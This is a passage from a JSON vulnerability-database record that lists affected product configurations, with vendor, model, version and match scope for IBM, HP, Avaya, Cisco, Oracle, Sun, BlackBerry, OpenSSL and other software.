            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.3.0.870"
          },
          {
            "_id": null,
            "model": "system management homepage b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.2.77"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.19"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for metrics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "tivoli asset management for it",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.12"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.3"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.25"
          },
          {
            "_id": null,
            "model": "blend for blackberry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "100"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0.0.840"
          },
          {
            "_id": null,
            "model": "prime data center network manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "business intelligence enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.7"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.013"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.21"
          },
          {
            "_id": null,
            "model": "cognos tm1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "java sdk 6r1 sr8-fp4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "(x86)5.0"
          },
          {
            "_id": null,
            "model": "infosphere master data management provider hub",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.12"
          },
          {
            "_id": null,
            "model": "sterling control center ifix03",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.41"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "rational software architect for websphere software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.3"
          },
          {
            "_id": null,
            "model": "norman shark industrial control system protection",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.3.2"
          },
          {
            "_id": null,
            "model": "version control repository manager 7.4.0a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.740"
          },
          {
            "_id": null,
            "model": "jdk 07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "one-x client enablement services sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.4"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "32153.50.01.10"
          },
          {
            "_id": null,
            "model": "websphere appliance management center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "one-x client enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "communication server 1000m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "messaging application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x22279160"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.11"
          },
          {
            "_id": null,
            "model": "jdk update31",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5.11"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "3.6"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90000"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.3"
          },
          {
            "_id": null,
            "model": "communication server 1000m signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.3.8.3"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.5"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12i",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2.1"
          },
          {
            "_id": null,
            "model": "tivoli monitoring",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.2"
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.366"
          },
          {
            "_id": null,
            "model": "jdk update13",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.7"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10m",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "communication server 1000e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "cognos business intelligence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "tivoli system automation for integrated operations management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.4"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.032"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "unified ip conference phone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "88310"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0e",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.45"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "security privileged identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.0.820"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.4"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.03"
          },
          {
            "_id": null,
            "model": "infosphere balanced warehouse c3000",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update19",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "chassis management module 2pete5o",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90007.5.1.0"
          },
          {
            "_id": null,
            "model": "communications session border controller scz7.2.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "rational developer for aix and cobol",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.21"
          },
          {
            "_id": null,
            "model": "multi-enterprise integration gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.0.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.5.0.2"
          },
          {
            "_id": null,
            "model": "src series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "endeca server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.3.0"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.8"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8t",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "buildforge ifix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3.66"
          },
          {
            "_id": null,
            "model": "system m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x355079440"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.32"
          },
          {
            "_id": null,
            "model": "telepresence mcu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "42000"
          },
          {
            "_id": null,
            "model": "hosted collaboration mediation fulfillment",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.2.0"
          },
          {
            "_id": null,
            "model": "aura messaging",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.14.20"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5.760"
          },
          {
            "_id": null,
            "model": "websphere real time sr7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "data ontap smi-s agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.2"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "insight orchestration",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "cloud manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35006.4"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.2"
          },
          {
            "_id": null,
            "model": "jdk update30",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.300"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "aura experience portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3850x571430"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.07"
          },
          {
            "_id": null,
            "model": "bbm on blackberry os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "100"
          },
          {
            "_id": null,
            "model": "rational sap connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.051"
          },
          {
            "_id": null,
            "model": "linux lts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "14.04"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "bes12 client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.0.0.70"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ctp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.14"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "smartcloud entry appliance fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.3.0.3"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.19"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.37"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.045"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 24144 68",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.3.0.5"
          },
          {
            "_id": null,
            "model": "tivoli common reporting",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.14"
          },
          {
            "_id": null,
            "model": "sametime community server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2"
          },
          {
            "_id": null,
            "model": "aura system manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.3"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.303"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "content collector for sap applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.5"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x375087330"
          },
          {
            "_id": null,
            "model": "smartcloud entry appliance fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.024"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.20"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "jre 07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.2.0.3"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.0.1"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.23"
          },
          {
            "_id": null,
            "model": "enterprise",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.2.2"
          },
          {
            "_id": null,
            "model": "aura session manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.1.0.7"
          },
          {
            "_id": null,
            "model": "mate live",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.02"
          },
          {
            "_id": null,
            "model": "netezza platform software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.12"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp02",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "telepresence integrator c series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ae2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90000"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.038"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1.104"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12f",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.10"
          },
          {
            "_id": null,
            "model": "nsm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.040"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.4"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.10"
          },
          {
            "_id": null,
            "model": "aura session manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "bbm protected on android",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.7.0.6"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.11"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3.0.0"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 25374 241",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "prime collaboration provisioning",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "pulse secure",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.041"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.029"
          },
          {
            "_id": null,
            "model": "initiate master data service provider hub",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "flashcopy manager for unix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "websphere real time",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.5"
          },
          {
            "_id": null,
            "model": "java sdk r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.1.73"
          },
          {
            "_id": null,
            "model": "telepresence isdn gw",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "32410"
          },
          {
            "_id": null,
            "model": "java sdk 7r1 sr2",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "system m5 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x310054570"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip multicast qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "telepresence ex series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for db2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
